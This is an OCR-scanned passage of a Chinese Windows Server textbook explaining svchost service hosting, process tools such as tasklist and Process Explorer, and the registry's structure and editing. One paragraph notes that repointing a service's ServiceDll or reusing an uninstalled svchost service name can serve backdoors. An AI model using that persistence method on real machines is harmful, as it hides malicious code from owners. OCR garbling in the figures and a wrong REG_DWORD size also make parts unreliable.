动态 链接 库 形 式 实现 ,在 安装 这 些 服 务 时 ,把 服务 的 可 执行 程序 指向 svchost, 启 动 这 些 服务 
时 由 svchost 调用 相应 服务 的 动态 链接 库 来 实现 。 

svchost 能 够 知道 某 一 服务 是 由 哪个 动态 链接 库 负责 的 ,这 不 是 由 服务 的 可 执行 程序 路 
径 中 的 参数 提供 的 ,而 是 服务 在 注册 表 中 的 参数 设置 的 ,注册 表 中 服务 下 边 有 一 个 
Parameters 子 键 ,其 中 的 ServiceDIll 表明 该 服务 由 哪个 动态 链接 库 负责 。 所 有 这 些 服务 的 
动态 链接 库 都 必须 要 导出 一 个 ServiceMain() 函数 ,用 来 处 理 服 务 任 务 。 当 启动 rpcss 服务 
时 ,svchost 就 会 调用 rpecss. dll ,并且 执 行 其 ServiceMain() 函 数 执行 具体 服务 。 

这 些 服 务 是 使 用 共享 进程 方式 由 svchost 启动 的 。 系 统 把 这 些 服务 分 为 几 组 , 同 组 服 
务 共 享 一 个 svchost 进程 ,不 同 组 服务 使 用 多 个 svchost 进程 ,所 以 就 会 有 多 个 svchost 进 
程 ,组 的 区 别 是 由 服务 的 可 执行 程序 后 边 的 参数 决定 的 。 

2. svchost 启动 服务 的 设置 


要 通过 svchost 调用 启动 的 服务 ,就 一 定 要 在 HKEY_LOCAL_MACHINE\SOFTWARE\ 
Microsoft\ Windows NT\CurrentVersion\Svchost 下 有 该 服务 名 ,可 以 通过 如 下 方式 来 
实现 。 

。 添加 一 个 新 的 服务 组 ,在 组 里 添加 服务 名 。 
。 在 现 有 组 里 添加 服务 名 。 
。 直接 使 用 现 有 服务 组 里 的 一 个 服务 名 ,但 本 机 没有 安装 的 服务 。 
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。 修改 现 有 服务 组 里 的 现 有 服务 ,把 它 的 ServiceDll 指向 自己 。 

其 中 前 两 种 可 以 被 正常 服务 使 用 ,如 使 用 第 一 种 方式 ,启动 其 服务 要 创建 新 的 svchost 
进程 ; 第 二 种 方式 ,如 果 该 组 服务 已 经 运行 ,安装 后 不 能 立刻 启动 服务 ,因为 svchost 启动 后 
已 经 把 该 组 信息 保存 在 内 存 里 ,并 调用 API StartServiceCtrlDispatcher( ) 为 该 组 所 有 服务 
注册 了 调度 处 理 函 数 ,新 增加 的 服务 不 能 再 注册 调度 处 理 函 数 ,需要 重启 计算 机 或 者 该 组 的 
svchost 进程 。 而 后 两 种 可 能 被 后 门 使 用 。 

svchost 中 可 以 包含 多 个 服务 ,svchost. exe 文件 存在 于 %systemroot% system32 目录 
下 ,属于 共享 进程 。 随 着 Windows 系统 服务 不 断 增多 ,为 了 节省 系统 资源 ,微软 把 很 多 服务 
做 成 共享 方式 , 交 由 svchost. exe 进程 来 启动 。 但 svchost 进程 只 作为 服务 宿主 ,并 不 能 实 
现任 何 服务 功能 , 即 它 只 能 提供 条 件 让 其 他 服务 在 这 里 被 启动 ,而 它 自己 却 不 能 给 用 户 提 供 
任何 服务 。 这 些 系统 服务 是 以 动态 链接 库 (DLL) 的 形式 实现 的 ,它们 把 可 执行 程序 指向 
svchost, 由 svchost 调用 相应 服务 的 动态 链接 库 来 启动 服务 。svchost 通过 系统 服务 在 注册 
表 中 设置 的 参数 来 知道 某 个 系统 服务 该 调用 哪个 动态 链接 库 。 


11.3.4 进程 工具 介绍 

目前 ,在 互联 网 上 ,有 各 种 各 样 的 进程 编辑 工具 ,可 以 说 各 有 特色 ,但 是 基本 功能 大 体 相 
同 (比如 查看 进程 .终止 进程 和 添加 进程 ), 这 里 只 介绍 Windows 自 带 的 命令 和 Process 
Explorer 工具 。 

1，Tasklist 命令 

Tasklist 命令 能 检查 当前 进程 的 情况 。 

使 用 命令 tasklist /v 后 执行 结果 如 图 11-6 所 示 。 


:\Docunents and Settings\Adninistrator>tasklist /v 


图 像 名 PID 会 话 名 


用 户 名 


mn Co 16 K Running 
NT AUTHORITYNSYSTEM 8:43:44 和 暂 缺 

systen 4 Console a 288 K Running 
NT AUTHORITYNSYSTEM 8:69:11 和 暂 缺 


图 11-6 进程 使 用 资源 界面 


使 用 命令 tasklist /svc 后 ,可 以 显示 每 个 进程 中 的 服务 。 

还 可 以 使 用 命令 tasklist /v 二 taskl. txt 或 者 tasklist /svc 二 task2. txt, 执 行 这 两 条 命 
令 后 会 在 当前 工作 目录 下 自动 生成 两 个 文本 文件 。 使 用 命令 tasklist /? 可 以 获得 tasklist 
的 更 多 使 用 方法 ,这 里 不 再 做 介绍 。 

2. Process Explorer 


Process Explorer 是 比较 好 的 进程 监视 工具 , 且 是 免费 的 。 它 不 仅 可 以 监视 .暂停 、 终 
止 进程 ,还 可 以 查看 进程 调用 的 DLL 文件 . 遇 到 不 熟悉 的 进程 还 可 以 直接 通过 Google 或 
MSN 搜索 。 另 外 ,还 可 查看 CPU 及 内 存 使 用 情况 ,对 进程 进行 调试 ,是 预防 病毒 、 查 杀 木 
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马 的 好 工具 ,该 工具 的 界面 如 图 11-7 所 示 。 


可 Process Elorer - Sysinternaks [13074Wdministrator] 
文件 {E) 选项 (0) 查看 (Y) 进程 P) 查找 (D 用户 W 帮助 (由 


加 加 到 上 国字 X 物 @ | 加 中 | 


ma 外 作 中 因 
me 在 基地 埋 两 用 
4 

444 Windows HT Session Na... Microsoft Corporation 

432 Client Server Runtine... Nicrosoft Corporation 

S16 Windows WT Loton Appl.,. Nicrosoft Corporation 

560 Services and Control1. Microsoft corporation 

724 Generic Host Process ... Wicrosoft Corporation 

| 644 99z009 Tencent 

T72 Caneric Host Process .. Nicrosoft Corporation 

340 Generic Host Process ... Microsoft Corporation 

952 Generic Host Process ... Microsoft Corporation EE 
1028 Generic Host Process ... Nicrosoft Corporation 和 
1144 Spooler Subsysten hpp Microsoft Corporation 


图 11-7 进程 查看 器 界面 


11.4 Windows Server 2008 注册 表 解 析 


11.4.1 注册 表 概 述 


PC 及 其 操作 系统 的 一 个 特点 就 是 允许 用 户 按照 自己 的 要 求 对 计算 机 系统 的 硬件 和 软 
件 进行 各 种 各 样 的 配置 。 在 早期 的 图 形 操作 系统 中 ,对 软 硬 件 工作 环境 的 配置 是 通过 对 扩 
展 名 为 .ini 的 文件 进行 修改 来 完成 的 ,但 ini 格式 的 文件 管理 起 来 很 不 方便 ,因为 每 种 设备 
或 应 用 程序 都 有 自己 的 ini 文件 ,并 且 在 网 络 上 难以 实现 远程 访问 。 为 了 解决 上 述 这 些 问 
题 ,在 Windows 95 及 其 后 继 版 本 中 ,采用 了 一 种 叫做 “注册 表 ” 的 数据 库 来 统一 进行 管理 ， 
将 各 种 信息 资源 集中 起 来 进行 存储 和 管理 ,其 中 还 存储 各 种 配置 信息 。 按 照 这 一 原则 ， 
Windows 各 版 本 中 都 采用 了 将 应 用 程序 和 计算 机 系统 全 部 配置 信息 容纳 在 一 起 的 注册 表 ， 
用 来 管理 应 用 程序 和 文件 的 关联 、 硬 件 设备 说 明 、 状 态 属性 以 及 各 种 状态 信息 和 数据 等 。 

Windows 的 注册 表 (Registry) 实 质 上 是 一 个 庞大 的 分 层 数据 库 , 它 记录 了 用 户 安装 在 
机 器 上 的 软件 和 每 个 程序 的 相互 关联 关系 ,包含 软 、 硬 件 的 有 关 配 置 和 状态 信息 ,应 用 程序 
和 资源 管理 器 外 过 的 初始 条 件 、 首 选项 和 印 载 数据 。 注 册 表 中 存放 着 各 种 参数 ,直接 控制 着 
Windows 的 启动 ,在 整个 系统 中 起 着 至 关 重要 的 作用 .包括 以 下 内 容 。 

(1) 软 、 硬 件 的 有 关 配 置 和 状态 信息 ,注册 表 中 保存 有 应 用 程序 和 资源 管理 器 外 壳 的 初 
始 条 件 、 首 选项 和 种 载 数 据 等 。 

(2) 联网 计算 机 整个 系统 的 设置 和 各 种 许可 ,文件 扩展 名 与 应 用 程序 的 关联 ,硬件 部 件 


的 描述 、 状 态 和 属性 。 
(3) 性 能 记录 和 其 他 底层 的 系统 状态 信息 ,以 及 其 他 数据 。 
注册 表 具 有 以 下 特点 。 


(1) 注册 表 允 许 对 硬件 、 系 统 参 数 、 应 用 程序 和 设备 驱动 程序 进行 跟踪 配置 ,这 使 得 修 
改 某 些 设置 后 不 用 重新 启动 成 为 可 能 。 
(2) 注册 表 中 登录 的 硬件 部 分 数据 可 以 支持 高 版 本 Windows 的 即 插 即 用 特性 。 当 
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Windows 检测 到 机 器 上 的 新 设备 时 ,就 把 有 关 数 据 保 存 到 注册 表 中 ,另外 ,还 可 以 避免 新 设 
备 与 原 有 设备 之 间 的 资源 冲突 。 

(3) 管理 人 员 和 用 户 通 过 注册 表 可 以 在 网 络 上 检查 系统 的 配置 和 设置 ,使 得 远程 管理 
得 以 实现 。 


11.4.2 注册 表 的 结构 


1. 注册 表 文 件 

注册 表 是 Windows 构造 的 一 个 复杂 的 信息 数据 库 , 在 不 同 版 本 的 Windows 系统 上 注 
册 表 的 基本 结构 相同 ,由 于 是 分 层次 的 ,复杂 的 数据 项 不 会 重复 但 又 会 以 不 同 的 方式 相互 关 
联 , 从 而 生成 一 个 绝对 唯一 的 注册 表 。 

在 Windows 95/98 中 ,注册 表 由 两 个 文件 组 成 : System. dat 和 User. dat, 保 存在 
Windows 所 在 的 文件 夹 中 ,它们 是 由 二 进 制 数 据 组 成 的 。System. dat 包含 系统 硬件 和 软件 
的 设置 ,User. dat 保存 着 与 用 户 有 关 的 信息 ,例如 资源 管理 器 的 设置 .颜色 方案 以 及 网 络 口 

在 Windows 2000、Windows Server 2003 和 Windows Server 2008 中 的 注册 表 也 分 为 
两 个 部 分 ,但 是 包括 多 个 文件 。 其 中 ,用 户 的 配置 文件 保存 在 根 目 录 下 的 用 户 名 目录 中 , 包 
括 Ntuser. dat 和 Ntuser. dat. log 文件 (此 类 文件 多 为 隐藏 文件 )。 系 统 配置 文件 位 于 系统 
目录 下 的 System32\config 中 ,包括 Default、Software、System、Appevent. evt、Sysevent. evt 
等 多 个 隐藏 文件 及 其 相应 的 log 文件 和 . sav 文件 。 这 些 文件 在 系统 运行 时 无 法 打开 。 

2. 注册 表 键 和 子 键 

在 Windows 系统 中 ,注册 表 是 采用 “关键 字 ”" 和 其 “ 键 值 ” 来 描述 登录 项 及 其 数据 的 。 所 
有 的 关键 字 都 是 以 “HKEY” 作 为 前 级 开头 。 在 注册 表 广 用 表 六 名 器 = 
中 ,关键 字 可 以 分 为 两 类 : 一 类 由 系统 定义 ,一 般 称 为 ”| 关中 寺 时 四 考生 天， 和 的 0 


“预定 义 关键 字 ”; 另 一 类 由 应 用 程序 定义 ,由 于 安装 的 | “名 宫 ssswr | 宣 gw 
应 用 软件 不 同 ,所 以 登录 项 也 不 同 。 在 “运行 "中 输入 | 3 日 吉 J 
“regedit”, 就 可 打开 注册 表 , 如 图 11-8 所 示 。 一 

注册 表 物 理 上 是 由 若干 文件 组 成 ,是 一 个 树 状 、 分 
层 的 数据 库 结构 。 如 果 某 个 键 包含 子 键 , 则 在 注册 表 用 下 全 入 国家 汶 奉 和 
编辑 器 窗口 左边 会 出 现 一 个 “十 "号 ,表示 这 个 文件 下 包括 其 他 内 容 , 如 果 被 打开 ,这 个 “十 ” 
号 就 变 成 了 “一 ”号 。 

可 以 看 出 ,在 Windows Server 2008 下 ,注册 表 被 分 为 5 大根 键 ,它们 是 : 

。 HKEY_CLASSES ROOT 

。 HKEY_CURRENT_USER 

。 HKEY_LOCAL MACHINE 

。 HKEY_USERS 

»° HKEY_CURRENT_CONFIG 

虽然 在 注册 表 中 5 个 根 键 共处 于 一 种 并 列 的 地 位 ,彼此 没有 关系 ,但 事实 上 ,HKEY_ 
LOCAL _ MACHINE 存放 的 信息 包含 HKEY_CLASSES_ROOT 和 HKEY_CURRENT_ 


我 的 电脑 VEEY_CURRERT_CONFIG 
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CONFIG 所 存放 的 信息 。 而 HKEY_USERS 所 存放 的 信息 包含 HKEY_CURRENT _ 
USER 中 的 所 有 信息 。 

3. 注册 表 键 值 类 型 

注册 表 由 键 . 子 键 和 值 项 构成 。 一 个 键 就 是 分 支 中 的 一 个 文件 夹 ,而 子 键 就 是 这 个 文件 
夹 中 的 子 文件 夹 , 子 键 同样 是 一 个 键 。 一 个 值 项 则 是 一 个 键 的 当前 定义 ,由 名 称 、 数 据 类 型 
以 及 分 配 的 值 组 成 。 一 个 键 可 以 有 一 个 或 多 个 值 ,每 个 值 的 名 称 各 不 相同 ,如果 一 个 值 的 名 
称 为 空 , 则 该 值 为 该 键 的 默认 值 。 
注册 表 通 过 键 和 子 键 来 管理 各 种 信息 。 但 是 注册 表 中 的 所 有 信息 都 是 以 各 种 形式 的 键 
值 项 数据 保存 的 。 在 注册 表 编 辑 器 右 窗 口中 显示 的 都 是 键 值 数 据 项 , 即 类 型 一 列 的 值 。 这 
些 键 值 数 据 可 以 分 为 三 种 类 型 。 

1) 二 进 制 

在 注册 表 中 ,二进制 (BINARY) 是 没有 长 度 限制 的 ,可 以 是 任意 长 度 的 字 节 。 在 注册 表 
中 ,二 进 制 数据 以 十 六 进 制 的 形式 显示 出 来 ,双击 键 值 名 ,就 会 弹出 “编辑 二 进 制 数值 ”对 话 
框 ,在 此 界面 上 可 以 进行 修改 ,如 图 11-9 所 示 。 

2) DWORD 值 

DWORD 值 是 一 个 32 位 长 度 的 数值 。 在 注册 表 编 辑 器 中 ,将 以 十 六 进 制 的 形式 显示 出 
来 ,双击 键 名 ,就 会 弹出 “编辑 DWORD(32 位 ) 值 ”对 话 框 ,在 此 界面 上 可 以 在 十 进 制 和 十 六 
进 制 之 间 切 换 , 如 图 11-10 所 示 。 


加 
- 雪 什 名称 0 
数值 名 称 如 Ee 
[FSFilter Physical Quota Nanagenent ] 数值 数据 号 ); 天 站 
数值 数据 4 徊 | + 
0000 To3 00 00 00 01 00 00 00 个 十进制) 
0008 02 00 00 00 03 00 00 00 
Cw ]_ ms | 
图 11-9 编辑 二 进 制 数值 图 11-10 编辑 DWORD 值 
3) 字符 串 值 
在 注册 表 中 ,字符 串 值 (SZ) 一 般 用 来 表示 文件 的 描述 和 硬件 标识 等 ,通常 由 字母 和 数 
中 可 以 进行 修改 ,如 图 11-11 所 示 。 雪人 名 称 0); 
[et 
4. 注册 表 数 据 类 型 数值 数据 (): 
Ecoooooooon] 
注册 表 的 键 中 包含 着 各 种 不 同 格式 的 数据 。 二 
数据 类 型 可 以 分 为 以 下 三 种 。 
(1) 通用 数据 类 型 RegEdit、RegEdt32 及 其 加 本 -本 编辑 字符 中 


他 绝 大 多 数 注册 表 工 具 都 支持 ,并 能 够 对 之 进行 编辑 的 数据 类 型 。 

(2) Windows NT 专用 数据 类 型 : RegEdt32 和 另外 几 个 注册 表 工 具 支 持 , 并 能 够 对 其 
进行 编辑 的 数据 类 型 。 

(3) 组 件 / 应 用 程序 专用 的 特殊 数据 类 型 : 注册 表 工 具 支持 这 些 数据 类 型 ,但 是 对 于 程 
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序 而 言 是 有 限度 的 。 用 户 只 能 将 其 作为 二 进 制 数 进行 编辑 。 实 际 上 ,注册 表 工 具 也 可 以 对 
不 支持 的 数据 类 型 进行 编辑 ,包括 那些 显示 为 REG_UNKNOWN 类 型 的 数据 。 但 是 编辑 仅 
能 在 二 进 制 模式 下 进行 ,这 就 需要 用 户 对 数据 对 象 的 格式 非常 了 解 。 对 于 那些 需要 手工 修改 
注册 表 的 用 户 来 说 ,理解 每 一 种 数据 类 型 以 及 每 一 种 类 型 数据 的 存储 格式 是 非常 重要 的 。 

常见 的 与 注册 表 有 关 的 术语 主要 有 以 下 几 个。 

(1) HKEY:“ 根 键 ? 或 “主键 ”, 它 的 图 标 与 资源 管理 器 中 文件 夹 的 图 标 有 些 相像 。 
Windows Server 2008 将 注册 表 分 为 5 个 部 分 ,并 称 之 为 HKEY_name, 它 意味 着 某 一 键 的 
句柄 。 

(2) key( 键 ): 它 包含 附加 的 文件 夹 和 一 个 或 多 个 值 。 

(3) subkey( 子 键 ) : 在 某 一 个 键 ( 父 键 ) 下 面 出 现 的 键 ( 子 键 )。 

(4) branch( 分 支 ) : 代表 一 个 特定 的 子 键 及 其 所 包含 的 一 切 。 一 个 分 支 可 以 从 每 个 注 
册 表 的 顶端 开始 ,但 通常 用 以 说 明 一 个 键 和 其 所 有 内 容 。 

(5) value entry( 值 项 ) : 带 有 一 个 名 称 和 一 个 值 的 有 序 值 。 每 个 键 都 可 包含 任何 数量 
的 值 项 。 每 个 值 项 均 由 三 部 分 组 成 : 名 称 ,数据 类 型 ,数据 。 

(6) 字符 串 (REG_SZ) : 顾名思义 , 即 一 串 ASCII 码 字符 。 如 “Hello World”, 是 一 串 文 
字 或 词组 。 在 注册 表 中 ,字符 串 值 一 般 用 来 表示 文件 的 描述 、 硬 件 的 标识 等 。 通 常 它 由 字母 
和 数字 组 成 。 注 册 表 总 是 在 引号 内 显示 字符 串 。 

(7) 二 进 制 (REG_BINARY): 如 F03D990000BC, 是 没有 长 度 限制 的 二 进 制 数值 ,在 注 
册 表 编辑 器 中 ,二进制 数据 以 十 六 进 制 的 方式 显示 出 来 。 

(8) 双 字 (REG_DWORD): 从 字面 上 理解 应 该 是 Double Word, 即 双 字 节 值 。 由 十 六 
进 制 数据 组 成 ,可 用 以 十 六 进 制 或 十 进 制 的 方式 来 编辑 ,如 D1234567 。 

(9) Default( 默 认 值 ) : 每 一 个 键 至 少 包括 一 个 值 项 , 称 为 默认 值 (Default) , 它 总 是 一 个 
字 串 。 

5. 注册 表 剖 析 

下 面具 体 看 看 系统 预定 义 的 5 个 根 键 。 

(1) HKEY_CLASSES_ROOT: 基层 类 别 键 , 定 义 了 系统 中 所 有 已 经 注册 的 文件 扩展 
名 文件 类 型 .文件 图 标 等 。 当 用 户 双击 一 个 图 标 时 ,系统 可 以 通过 这 些 信息 启动 相应 的 应 
用 程序 。HKEY_CLASSES_ROOT 根 键 中 存放 的 信息 与 HKEY_LOCAL_MACHINE\ 
Software\Classes 分 支 中 的 信息 存放 是 一 致 的 。HKEY_CLASSES_ROOT 根 键 由 多 个 子 
键 组 成 ,具体 可 分 为 两 种 : 一 种 是 已 注册 的 各 类 文件 的 扩展 名 ; 另 一 类 是 各 种 文件 类 型 的 
有 关 信 息 。 

(2) HKEY_CURRENT_USER: 定义 了 当前 用 户 的 所 有 权限 ,包含 当前 用 户 的 登录 信 
息 ,实际 上 就 是 HKEY_USERS. Default 下 面 的 一 部 分 内 容 。 

(3) HKEY_LOCAL_MACHINE: 定义 了 本 地 计算 机 (相对 网 络 环境 而 言 ) 的 软 硬 件 
的 全 部 信息 。 当 系统 的 配置 和 设置 发 生变 化 时 ,其 下 的 登录 项 也 会 随 之 改变 。 

(4) HKEY_USERS: 定义 了 所 有 的 用 户 信 息 , 它 的 大 部 分 设置 都 可 以 通过 控制 面板 来 
修改 ,其 中 部 分 分 支 将 映射 到 HKEY_CURRENT_USER 关键 字 中 。 

(5) HKEY_CURRENT_CONFIG: 定义 了 计算 机 的 当前 配置 情况 ,如 显示 器 、 打 印 机 
等 可 选 外 部 设备 及 其 设置 信息 等 。 它 实际 上 也 是 指向 HKEY_LOCAL_MACHINE\Config 
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结构 中 的 某 个 分 支 的 指针 。 

下 面 对 HKEY_LOCAL_MACHINE 进行 深入 分 析 。 

HARDWARE 子 键 : 该 子 键 下 面 存放 一 些 有 关 超 文本 终端 ,数学 协 处 理 器 和 串口 等 
信息 。 

SAM 子 键 : 系统 自动 将 其 保护 起 来 。 

SECURITY 子 键 : 包含 安全 设置 的 信息 ,同样 也 让 系统 保护 起 来 。 

SOFTWARE 子 键 : 包含 系统 软件 、 当 前 安装 的 应 用 软件 及 用 户 的 有 关 信 息 。 
SYSTEM 子 键 : 该 子 键 存放 的 是 启动 时 所 使 用 的 信息 和 修复 系统 时 所 需 的 信息 ,其 
中 包括 各 个 驱动 程序 的 描述 信息 和 配置 信息 等 。System 子 键 下 面 有 一 个 
CurrentControlSet 子 键 ,系统 在 这 个 子 键 下 保存 了 当前 的 驱动 程序 控制 集 的 信息 。 

这 里 介绍 CurrentControlSet 子 键 下 面 的 Control 和 Services 子 键 。 

Control 子 键 : 该 子 键 中 保存 的 是 由 控制 面板 中 各 个 图 标 程 序 设置 的 信息 。 由 于 控制 
面板 中 的 各 个 图 标 程序 可 能 会 把 信息 写 在 不 同 的 子 键 下 ,所 以 用 户 最 好 不 要 通过 注册 表 编 
辑 器 来 修改 这 些 信息 ,否则 容易 引起 系统 死机 。Control 子 键 包含 以 下 的 子 键 。 

1) FontAssoc 子 键 

该 子 键 存 放 的 是 有 关 字 体 设置 信息 (如 默认 字体 、 替 代 字 体 以 及 字符 集 等 ) 。 

2) Nls 子 键 

位 于 HKEY_LOCAL _MACHINE\System\CurrentControlSet\control\Nls 分 支 中 , 它 
是 用 来 设置 Windows 的 语言 特性 ,如 代码 页 .EUDC 内 码 范围 ,语言 分 类 等 。 

3) SessionManager 子 键 

该 子 键 用 于 管理 系统 的 会 话 。 

4) MediaResources 子 键 

位 于 HKEY _LOCAL_ MACHINE \ System \ CurrentControlSet \ control \ Media- 
Resources 分 支 上 ,该 子 键 用 于 设置 多 媒体 资源 。 

5) MediaProperties 子 键 

位 于 HKEY _LOCAL_ MACHINE \ System \ CurrentControlSet \ control \ Media- 
Properties 分 支 上 ,用 于 设置 多 媒体 的 属性 。 

6) FileSystem 子 键 

位 于 HKEY_LOCAL MACHINE\System\CurrentControlSet\control\FileSystem 分 
支 上 ,主要 对 Windows 文件 系统 进行 设置 。 

7) shutdown 子 键 

位 于 HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\Shutdown 分 
支 上 ,用 于 对 Windows 关机 时 的 设置 ,里 面 有 一 个 快速 关机 的 设置 。 

8) Keyboard Layouts 子 键 

位 于 HKEY_LOCAL_MACHINE\System\ CurrentControlSet \ control \ Keyboard 
Layouts 分 支 上 ,主要 对 Windows 的 键盘 布局 (Keyboard Layouts) 或 者 键盘 语言 进行 设置 。 
该 子 键 下 面包 括 多 个 关于 键盘 语言 (也 包括 汉字 输入 法 ) 的 子 键 ,这 些 子 键 使 用 数值 表示 。 

9) Update 子 键 

位 于 HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\Update 分 支 
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上 ,用 于 确定 “控制 面板 ”窗口 是 否 被 刷新 ,此 子 键 的 功能 与 “控制 面板 ”窗口 中 的 “查看 ”菜单 
中 的 “刷新 ”相同 。 

10) TimeZoneInformation 子 键 

位 于 HKEY_LOCAL_MACHINE\SystemN\CurrentControlSet\control\ TimeZoneInformation 
分 支 上 ,用 于 设置 时 区 信息 。 

11) Print 子 键 

位 于 HKEY_LOCAL_ _ MACHINE\System\CurrentControlSet\control\Print 分 支 上 ， 
用 于 设置 打印 机 。 

12) IDConfigDB 子 键 

位 于 HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\ IDConfigDB 
分 支 上 ,用 于 显示 硬件 配置 文件 的 配置 数据 、 配 置 名称 等 其 他 信息 。 

13) ComputerName 子 键 

该 分 层 结 构 用 于 设置 计算 机 名 称 。 

14) SecurityProvider 子 键 

位 于 HKEY_LOCAL MACHINE\System\CurrentControlSet\control\SecurityProviders 分 
支 上 ,用 于 设置 网 络 供应 商 的 安全 功能 。 

Services 子 键 : 该 子 键 位 于 HKEY_LOCAL_MACHINE\NSystemNCurrentControlSetN 
Services 分 支 上 。 该 子 键 中 存放 了 Windows 中 各 项 服务 的 信息 ,有 些 是 自 带 的 ,有 些 是 随 
后 安装 的 。 在 该 子 键 下 面 的 每 个 子 键 中 存放 相应 服务 的 配置 和 描述 信息 。Services 子 键 包 
括 以 下 子 键 。 

1) Class 子 键 

该 子 键 位 于 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class 
分 支 上 。 该 子 键 中 保存 的 是 Windows 支持 的 不 同 种 类 硬件 的 信息 , 它 下 面 的 子 键 与 “控制 
面板 ”中 添加 新 硬件 的 分 类 类 似 。 

2) VxD 子 键 

该 子 键 位 于 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ VxD 
分 支 上 。 该 子 键 保存 了 Windows 中 所 有 虚拟 设备 驱动 程序 的 信息 。 由 于 Windows 系统 能 
够 自动 管理 这 些 信 息 , 因 此 ,在 通常 情况 下 最 好 不 要 通过 注册 表 编 辑 器 来 修改 这 些 信息 ,但 
是 了 解 此 子 键 下 的 信息 是 有 好 处 的 ,因为 有 一 些 功 能 (如 拨号 网 络 提速 ) 必 须 修改 此 子 键 下 
的 信息 。 

3) Winsock 子 键 

该 子 键 位 于 HKEY _LOCAL _MACHINE\ System\ CurrentControlSet \ Services \ 
Winsock 分 支 上 ,存放 的 是 当 系 统 连接 Internet 时 使 用 的 WinSock 的 信息 。 

4) WDMFS 子 键 

该 子 键 位 于 HKEY_LOCAL_MACHINEA System \ CurrentControlSet \ Services\ 
WDMEFS 分 支 上 ,用 于 设置 WDMFSCWDM 文件 系统 ) 。 

5) UPDATE 子 键 

该 子 键 位 于 HKEY_LOCAL_MACHINE\System\CurrentControlSet\ Services\ UPDATE 
分 支 上 ,用 于 设置 UPDATE( 更 新 服务 )。 
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6) RemoteAccess 子 键 

位 于 HKEY LOCAL MACHINE\System\CurrentControlSet\Services\RemoteAccess 分 支 
上 ,存放 的 是 和 Windows 拨号 网 络 有 关 的 信息 。 

7) MSNP32 子 键 

该 子 键 用 于 保存 Microsoft 网 络 用 户 的 验证 信息 。 

8) NWNP32 子 键 

该 子 键 中 存放 的 是 Microsoft 网 络 用 户 针对 Netware 网 络 时 的 验证 信息 。 

9) Arbitrators 子 键 

该 子 键 位 于 HKEY _LOCAL_MACHINE\ System \ CurrentControlSet \ Services \ 
Arbitrators 分 支 上 。 该 子 键 中 保存 的 信息 是 用 来 解决 不 同 的 设备 间 资 源 冲突 的 问题 , 它 的 
4 个子 键 中 分 别 保存 了 内 存 区 域 .DMA IO 端口 和 中 断 的 信息 。 

10) WinSock2 子 键 

该 子 键 位 于 HKEY _ LOCAL _MACHINE\ SystemAN CurrentControlSet \ Services\ 
WinSock2 分 支 上 ,用 于 存放 与 Internet 连接 时 WinSock 2.0 版 本 的 有 关 信 息 。 

11) wdmaud 子 键 

该 子 键 位 于 HKEY _ LOCAL_MACHINE\System\ CurrentControlSet \ Services \ 
wdmaud 分 支 上 ,用 于 存放 WDM Audio(WDM 音频 ) 信 息 。 

12) NPSTUB 子 键 

该 子 键 用 于 存放 “Microsoft 友好 登录 ”的 有 关 信 息 。 

13) WebPost 子 键 

该 子 键 下 面 保存 了 所 有 与 Internet Mail( 这 是 Outlook Express 软件 中 的 一 个 电子 邮件 
管理 程序 ) 有 关 的 信息 。 


11.4.3 注册 表 的 操作 


1. 注册 表 键 值 的 添加 和 删除 

打开 注册 表 编 辑 界面 ,选中 要 添加 的 键 值 ,这 里 以 HKEY_LOCAL_MACHINE\ 
Software 为 例 进 行 说 明 。 

首先 右键 选中 HKEY_LOCAL_MACHINE\Software, 在 弹出 的 菜单 选择 “项 ”命令 ,并 
命名 为 “new 1”, 接 着 右键 选中 “new 1”, 在 弹出 的 菜单 选择 “项 ”命令 ,并 命名 为 “new 2”, 结 
果 如 图 11-12 所 示 。 

右键 选中 “new 2”, 在 弹出 的 菜单 中 选择 “字符 串 值 ”, 默 认 名 为 “新 建 #1?。 右 键 选中 
“新 建 #1”, 可 进行 重 命 名 ,至 于 新 建 其 他 值 ,读者 可 自行 实践 ,如 图 11-13 所 示 。 


BEG_SZ 虔 值 未 设置 ) 
REG_SZ 
由 国 Vware, Inc. 加 
十 国 YISE Technology| BEG_BINARY 仿 度 为 季 的 二 进位 值 ) 
已 国 ae 1 BEG_DYORD 0x00000000 (D0) 
和 new 2 BEG MULIT_SZ 
BS FEG_EXPAND_SZ 


图 11-12 新 建 项 图 11-13 新建 项 值 
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删除 的 操作 很 简单 ,右键 选中 所 要 删除 的 内 容 , 在 弹出 的 菜单 选择 "删除 ”命令 ,如 果 确 
定 要 删除 ,在 弹出 的 菜单 单 击 “ 是 (Y) ”按钮 。 
2. 注册 表 的 导出 与 导入 


导出 注册 表 也 就 是 备份 注册 表 ,打开 注册 表 编 辑 器 界面 ,右键 选中 要 备份 的 内 容 , 在 弹 
出 的 菜单 中 选择 “导出 ”命令 ,如 图 11-14 所 示 。 


文件 名 吸 : [ | 保存 GS) 
保存 类 型 中 )。 ”| 注册 文件 tree) ” 取消 


开 全 部 和 ) 
人 所 选 分 支 中 ) 
PEY LDCAL MACHTNE\SOFTWARE 


图 11-14 注册 表 导 出 界面 


在 此 界面 上 可 以 设置 所 导出 注册 表 的 存放 位 置 .文件 名 、 保 存 类 型 和 导出 范围 。 如 果 保 
存 类 型 设置 为 文本 文件 ,还 可 以 浏览 。 设 置 完 以 上 内 容 , 单 击 * 保 存 ? 按 钮 即 可 。 

导入 就 是 注册 表 还 原 , 是 导出 的 逆 过 程 。 单 击 注册 表 编 辑 界面 上 的 “文件 "选项 ,在 弹出 
的 菜单 中 选择 导入” 命令。 然后 找到 备份 文件 的 位 置 以 及 要 还 原 的 备份 内 容 , 单 击 “ 打 开 ” 
即 可 ,在 最 后 会 弹出 一 个 告警 界面 ,如 图 11-15 所 示 。 

出 现 此 界面 是 正常 的 ,因为 当前 系统 正在 使 用 该 键 下 的 内 容 , 所 以 无 法 导入 ,但 这 只 是 
部 分 内 容 , 影 响 并 不 大 , 单 击 “ 确 定 ” 按 钮 即 可 。 


@ 严 器 C:\Documents and 3ettines\Adninistrator SERVER3. 000\ 电 面 \1.res， 部 分 数据 未 成 功 写 入 注册 表 。 系 统 或 其 起 进 程 正在 打 


CC 于 


图 11-15 告警 界面 
在 互联 网 上 有 很 多 注册 表 工 具 , 比 如 Windows 优化 大 师 .超级 兔子 、RegCleaner 等 ,这 
些 工 具 是 基于 Windows 图 形 化 界面 的 ,安装 与 使 用 都 非常 简单 。 
3. 注册 表 的 修改 方法 
